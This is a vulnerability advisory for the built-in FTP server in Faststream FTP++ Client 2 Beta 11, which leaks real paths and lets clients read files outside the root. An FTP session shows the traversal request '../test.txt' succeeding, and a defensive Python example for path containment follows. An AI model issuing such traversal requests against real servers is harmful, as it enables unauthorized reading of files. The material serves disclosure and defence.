COMMAND

    Faststream FTP++

SYSTEMS AFFECTED

    Faststream FTP++ Client 2 Beta 11 (built-in server)

PROBLEM

    'se00020' found the following.  The Faststream FTP built-in server
    responds with the real path of the directory instead of a virtual
    one.  It is possible to get files outside of the root directory.
    Note that this is similar to:

        http://oliver.efri.hr/~crv/security/bugs/Others/fastream.html

    In the session below, e:\crap was used as the root directory:

        230 User anonymous logged in.
        ftp> pwd
        257 "/E:/crap/" is current directory.
        
        ftp> dir
        200 Port command successful.
        150 Opening data connection for directory list.
        drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
        drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
        drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
        -rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
        -rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 bisontest.txt
        drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
        drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
        226 File sent ok
        FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s
        ftp> get ../test.txt
        200 Port command successful.
        150 Opening data connection for ../test.txt.
        226 File sent ok
        FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

SOLUTION

    The vendor has just fixed this; the fix is in Beta 12.  It had
    been fixed in an earlier beta (tested it), however it seems the
    fix wasn't incorporated in the latest version.
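
    One way an FTP server can keep both the PWD reply and file requests
    inside the virtual root, written in Python as an added example (not
    the vendor's code and not part of the original advisory).  The
    function names are hypothetical; ROOT is the e:\crap directory from
    the session above.

```python
import ntpath  # Windows path semantics, usable on any host OS

ROOT = r"E:\crap"  # root directory used in the advisory's session


def to_virtual(cwd, arg):
    """Resolve a client path against the virtual cwd; never climb above the root."""
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PermissionError("path escapes virtual root")
            parts.pop()
        elif ":" in comp or comp[-1] in ". ":
            # drive letters, alternate data streams, and names that Win32
            # normalisation could rewrite (trailing dot or space)
            raise PermissionError("illegal path component")
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def to_real(virtual):
    """Map a normalised virtual path to disk and re-check containment."""
    real = ntpath.normpath(ntpath.join(ROOT, *virtual.strip("/").split("/")))
    try:
        common = ntpath.commonpath([ROOT, real])
    except ValueError:  # path ended up on a different drive
        common = ""
    if ntpath.normcase(common) != ntpath.normcase(ROOT):
        raise PermissionError("path escapes virtual root")
    return real


def pwd_reply(cwd):
    """257 reply carrying only the virtual path, never ROOT."""
    return '257 "%s" is current directory.' % cwd


if __name__ == "__main__":
    print(pwd_reply("/"))
    for arg in ("bisontest.txt", "../test.txt"):
        try:
            print(arg, "->", to_real(to_virtual("/", arg)))
        except PermissionError as exc:
            print(arg, "-> 550", exc)
```

    The server keeps only the virtual cwd per session, so the real
    drive and directory never appear in any reply.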